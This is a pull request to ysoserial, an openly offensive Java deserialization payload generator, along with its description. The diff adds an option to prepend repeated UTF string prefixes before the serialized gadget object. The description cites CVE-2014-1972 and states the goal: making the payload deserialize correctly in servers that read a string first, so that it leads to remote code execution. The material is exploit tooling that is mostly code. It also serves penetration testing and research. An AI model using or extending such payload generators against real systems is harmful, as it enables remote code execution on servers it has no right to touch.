### PR TITLE
add optional String prefix to serialized object

### DIFF
--- a/src/main/java/ysoserial/GeneratePayload.java
+++ b/src/main/java/ysoserial/GeneratePayload.java
@@ -16,9 +16,11 @@ public class GeneratePayload {
 
 	private static final int INTERNAL_ERROR_CODE = 70;
 	private static final int USAGE_CODE = 64;
+	private static final int EMPTY_PREFIX_NUMBER = 0;
+	private static final String EMPTY_PREFIX = "";
 
 	public static void main(final String[] args) {
-		if (args.length != 2) {
+		if (args.length != 2 && args.length != 4) {
 			printUsage();
 			System.exit(USAGE_CODE);
 		}
@@ -33,11 +35,22 @@ public class GeneratePayload {
 			return; // make null analysis happy
 		}
 
+		int prefixNum = EMPTY_PREFIX_NUMBER;
+		String prefix = EMPTY_PREFIX;
+		if (args.length == 4) {
+			prefixNum = parsePrefixNumber(args[2]);
+			prefix = args[3];
+		}
+
 		try {
 			final ObjectPayload payload = payloadClass.newInstance();
 			final Object object = payload.getObject(command);
 			PrintStream out = System.out;
-			Serializer.serialize(object, out);
+			if (prefixNum != EMPTY_PREFIX_NUMBER) {
+				Serializer.serializeWithPrefix(object, out, prefixNum, prefix);
+			} else {
+				Serializer.serialize(object, out);
+			}
 			ObjectPayload.Utils.releasePayload(payload, object);
 		} catch (Throwable e) {
 			System.err.println("Error while generating or serializing payload");
@@ -50,6 +63,7 @@ public class GeneratePayload {
 	private static void printUsage() {
 		System.err.println("Y SO SERIAL?");
 		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
+		System.err.println("    or java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]' [prefix repeat number] '[prefix]'");
 		System.err.println("\tAvailable payload types:");
 		final List<Class<? extends ObjectPayload>> payloadClasses =
 			new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
@@ -57,10 +71,23 @@ public class GeneratePayload {
 		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
 			System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
 		}
+		System.err.println("\t[prefix repeat number] and [prefix] are optional params");
+		System.err.println("\t[prefix] String will be prepended to the resulting object [prefix repeat number] times.");
 	}
 
 	public static class ToStringComparator implements Comparator<Object> {
 		public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
 	}
 
+	private static int parsePrefixNumber(String param) {
+		try {
+			int prefixNum = Integer.parseInt(param);
+			return prefixNum;
+		} catch (Throwable e) {
+			System.err.println("'" + param + "' is not a number");
+			printUsage();
+			System.exit(USAGE_CODE);
+		}
+		return EMPTY_PREFIX_NUMBER;
+	}
 }

--- a/src/main/java/ysoserial/Serializer.java
+++ b/src/main/java/ysoserial/Serializer.java
@@ -27,4 +27,12 @@ public class Serializer implements Callable<byte[]> {
 		objOut.writeObject(obj);
 	}
 
+	public static void serializeWithPrefix(final Object obj, final OutputStream out,
+										   int prefixNum, String prefix) throws IOException {
+		final ObjectOutputStream objOut = new ObjectOutputStream(out);
+		for(int i = 0; i < prefixNum; i++) {
+			objOut.writeUTF(prefix);
+		}
+		objOut.writeObject(obj);
+	}
 }


### PR DESCRIPTION
If object reading code looks like this (CVE-2014-1972)

```
                    String componentId = ois.readUTF();
                    ComponentAction action = (ComponentAction) ois.readObject();

                    component = source.getComponent(componentId);

```
then sending just serialized object as an input will fail.
This patch allows to prepend string prefix to serialized data so readObject will work properly and lead to RCE.